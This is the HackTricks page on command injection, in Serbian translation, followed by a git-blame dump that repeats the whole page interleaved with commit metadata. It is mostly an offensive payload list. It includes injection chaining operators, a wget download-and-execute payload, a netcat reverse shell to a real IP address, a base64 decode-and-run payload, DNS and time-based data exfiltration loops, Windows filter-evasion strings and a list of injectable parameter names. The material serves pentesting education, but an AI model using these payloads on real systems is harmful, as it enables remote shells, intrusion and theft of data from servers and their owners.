hacktricks/pentesting-web/command-injection.md

# Command Injection

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}

## Šta je command injection?

**Command injection** omogućava izvršavanje proizvoljnih komandi operativnog sistema od strane napadača na serveru koji hostuje aplikaciju. Kao rezultat, aplikacija i svi njeni podaci mogu biti potpuno kompromitovani. Izvršavanje ovih komandi obično omogućava napadaču da dobije neovlašćen pristup ili kontrolu nad okruženjem aplikacije i osnovnim sistemom.

### Kontekst

U zavisnosti od **gde se vaši unosi ubacuju**, možda ćete morati da **prekinete citirani kontekst** (koristeći `"` ili `'`) pre komandi.

## Command Injection/Execution
```bash
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
```
### **Limitation** Bypasses

Ako pokušavate da izvršite **arbitrarne komande unutar linux mašine** biće vam zanimljivo da pročitate o ovim **Bypasses:**

{% content-ref url="../linux-hardening/bypass-bash-restrictions/" %}
[bypass-bash-restrictions](../linux-hardening/bypass-bash-restrictions/)
{% endcontent-ref %}

### **Primjeri**
```
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
```
### Parameters

Evo 25 najvažnijih parametara koji bi mogli biti podložni kod injekciji i sličnim RCE ranjivostima (iz [link](https://twitter.com/trbughunters/status/1283133356922884096)):
```
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
```
### Time based data exfiltration

Ekstrakcija podataka: znak po znak
```
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s
```
### DNS based data exfiltration

Na osnovu alata sa `https://github.com/HoLyVieR/dnsbin` koji je takođe hostovan na dnsbin.zhack.ca
```
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```

```
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
Online alati za proveru DNS zasnovanog exfiltracije podataka:

* dnsbin.zhack.ca
* pingb.in

### Zaobilaženje filtriranja

#### Windows
```
powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
```
#### Linux

{% content-ref url="../linux-hardening/bypass-bash-restrictions/" %}
[bypass-bash-restrictions](../linux-hardening/bypass-bash-restrictions/)
{% endcontent-ref %}

## Lista za detekciju Brute-Force

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}

## Reference

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
* [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)

{% hint style="success" %}
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Podržite HackTricks</summary>

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>
{% endhint %}

<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Koristite [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) za lako kreiranje i **automatizaciju radnih tokova** pokretanih **najnaprednijim** alatima zajednice na svetu.\
Dobijte pristup danas:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`# Command Injection`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`<summary>Support HackTricks</summary>`
arte 2023-12-31 01:25:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:40:09 +00:00			`<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>`
GitBook: [#3633] No subject 2022-10-27 23:22:18 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Use [Trickest](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and automate workflows powered by the world's most advanced community tools.\`
			`Get Access Today:`
GitBook: [#3633] No subject 2022-10-27 23:22:18 +00:00
Translated ['crypto-and-stego/certificates.md', 'generic-methodologies-a 2024-05-06 11:16:53 +00:00			`{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}`
GitBook: [#3633] No subject 2022-10-27 23:22:18 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`## Šta je command injection?`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Command injection omogućava izvršavanje proizvoljnih komandi operativnog sistema od strane napadača na serveru koji hostuje aplikaciju. Kao rezultat, aplikacija i svi njeni podaci mogu biti potpuno kompromitovani. Izvršavanje ovih komandi obično omogućava napadaču da dobije neovlašćen pristup ili kontrolu nad okruženjem aplikacije i osnovnim sistemom.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`### Kontekst`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			U zavisnosti od gde se vaši unosi ubacuju, možda ćete morati da prekinete citirani kontekst (koristeći `"` ili `'`) pre komandi.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`## Command Injection/Execution`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`#Both Unix and Windows supported`
			`ls\|\|id; ls \|\|id; ls\|\| id; ls \|\| id # Execute both`
			`ls\|id; ls \|id; ls\| id; ls \| id # Execute both (using a pipe)`
			`ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok`
			`ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º`
			`ls %0A id # %0A Execute both (RECOMMENDED)`

			`#Only unix supported`
			`ls` # ``
			`$(ls) # $()`
			`ls; id # ; Chain commands`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			`ls${LS_COLORS:10:1}${IFS}id # Might be useful`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Update command-injection.md 2022-10-10 00:18:23 +00:00			`#Not executed but may be interesting`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`> /var/www/html/out.txt #Try to redirect the output to a file`
			`< /etc/passwd #Try to send some input to the command`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`### Limitation Bypasses`
GitBook: No commit message 2024-04-06 19:39:21 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Ako pokušavate da izvršite arbitrarne komande unutar linux mašine biće vam zanimljivo da pročitate o ovim Bypasses:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: No commit message 2024-04-06 19:39:21 +00:00			`{% content-ref url="../linux-hardening/bypass-bash-restrictions/" %}`
			`[bypass-bash-restrictions](../linux-hardening/bypass-bash-restrictions/)`
GitBook: [#3535] No subject 2022-10-02 23:08:05 +00:00			`{% endcontent-ref %}`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00
			`### Primjeri`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php`
			`vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80`
			`vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt \| base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`### Parameters`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Evo 25 najvažnijih parametara koji bi mogli biti podložni kod injekciji i sličnim RCE ranjivostima (iz [link](https://twitter.com/trbughunters/status/1283133356922884096)):`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 354 pages modified 2020-07-29 09:22:22 +00:00			`?cmd={payload}`
			`?exec={payload}`
			`?command={payload}`
			`?execute{payload}`
			`?ping={payload}`
			`?query={payload}`
			`?jump={payload}`
			`?code={payload}`
			`?reg={payload}`
			`?do={payload}`
			`?func={payload}`
			`?arg={payload}`
			`?option={payload}`
			`?load={payload}`
			`?process={payload}`
			`?step={payload}`
			`?read={payload}`
			`?function={payload}`
			`?req={payload}`
			`?feature={payload}`
			`?exe={payload}`
			`?module={payload}`
			`?payload={payload}`
			`?run={payload}`
			`?print={payload}`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`### Time based data exfiltration`
GitBook: [master] 354 pages modified 2020-07-29 09:22:22 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Ekstrakcija podataka: znak po znak`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00			`swissky@crashlab▸ ~ ▸ $ time if [ $(whoami\|cut -c 1) == s ]; then sleep 5; fi`
			`real 0m5.007s`
			`user 0m0.000s`
			`sys 0m0.000s`

			`swissky@crashlab▸ ~ ▸ $ time if [ $(whoami\|cut -c 1) == a ]; then sleep 5; fi`
			`real 0m0.002s`
			`user 0m0.000s`
			`sys 0m0.000s`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`### DNS based data exfiltration`
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			Na osnovu alata sa `https://github.com/HoLyVieR/dnsbin` koji je takođe hostovan na dnsbin.zhack.ca
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00			`1. Go to http://dnsbin.zhack.ca/`
			`2. Execute a simple 'ls'`
			`for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done`
			```

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00			`$(host $(wget -h\|head -n1\|sed 's/[ ,]/-/g'\|tr -d '.').sudo.co.il)`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Online alati za proveru DNS zasnovanog exfiltracije podataka:`
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00
			`* dnsbin.zhack.ca`
			`* pingb.in`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`### Zaobilaženje filtriranja`
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`#### Windows`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
fix bad chars 2022-04-05 22:24:52 +00:00			`powershell C:*2\n??ed.*? # notepad`
			`@^p^o^w^e^r^shell c:*32\c?c.e?e # calc`
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00			```
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`#### Linux`
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00
GitBook: No commit message 2024-04-06 19:39:21 +00:00			`{% content-ref url="../linux-hardening/bypass-bash-restrictions/" %}`
			`[bypass-bash-restrictions](../linux-hardening/bypass-bash-restrictions/)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% endcontent-ref %}`
GitBook: [master] 2 pages modified 2021-06-25 16:50:01 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`## Lista za detekciju Brute-Force`
GitBook: [master] 10 pages modified 2021-06-27 21:56:13 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}`
GitBook: [master] 10 pages modified 2021-06-27 21:56:13 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`## Reference`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
a 2024-02-06 03:10:38 +00:00			`* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)`
			`* [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% hint style="success" %}`
			`Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`<summary>Podržite HackTricks</summary>`
arte 2023-12-31 01:25:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`* Proverite [planove pretplate](https://github.com/sponsors/carlospolop)!`
			`* Pridružite se 💬 [Discord grupi](https://discord.gg/hRep4RUj7f) ili [telegram grupi](https://t.me/peass) ili pratite nas na Twitteru 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Podelite hakerske trikove slanjem PR-ova na [HackTricks](https://github.com/carlospolop/hacktricks) i [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`{% endhint %}`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:40:09 +00:00			`<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00
			`\`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:13:40 +00:00			`Koristite [Trickest](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) za lako kreiranje i automatizaciju radnih tokova pokretanih najnaprednijim alatima zajednice na svetu.\`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:40:09 +00:00			`Dobijte pristup danas:`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00
Translated ['crypto-and-stego/certificates.md', 'generic-methodologies-a 2024-05-06 11:16:53 +00:00			`{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}`